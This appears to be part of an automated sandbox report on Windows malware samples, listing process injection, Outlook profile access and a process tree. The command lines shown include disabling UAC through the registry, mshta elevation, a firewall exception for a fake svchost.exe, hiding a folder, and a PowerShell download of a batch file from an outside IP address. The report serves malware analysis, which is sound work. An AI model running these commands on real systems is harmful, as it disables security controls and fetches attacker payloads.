Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2500 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 4992 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4992 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4992 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4992 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4992 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4992 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4992 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 4992 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 4992 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 4992 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
PID 4992 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
PID 4992 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
PID 4992 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
PID 4992 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
PID 2644 wrote to memory of 3960 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2644 wrote to memory of 3960 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2644 wrote to memory of 3960 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 4616 wrote to memory of 1864 N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe C:\Windows\SYSTEM32\cmd.exe
PID 4616 wrote to memory of 1864 N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe C:\Windows\SYSTEM32\cmd.exe
PID 4992 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe
PID 4992 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe
PID 4992 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe
PID 4992 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
PID 4992 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
PID 4992 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
PID 2260 wrote to memory of 892 N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 892 N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 892 N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe C:\Windows\SysWOW64\cmd.exe
PID 892 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3696 wrote to memory of 3460 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3696 wrote to memory of 3460 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3460 wrote to memory of 3748 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3460 wrote to memory of 3748 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe

"C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c net use

C:\Windows\SysWOW64\net.exe

net use

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff846cccc40,0x7ff846cccc4c,0x7ff846cccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2408 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4112,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE10.tmp\BE11.tmp\BE12.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C1D9.tmp\C1DA.tmp\C1DB.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff842e83cb8,0x7ff842e83cc8,0x7ff842e83cd8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 /prefetch:3

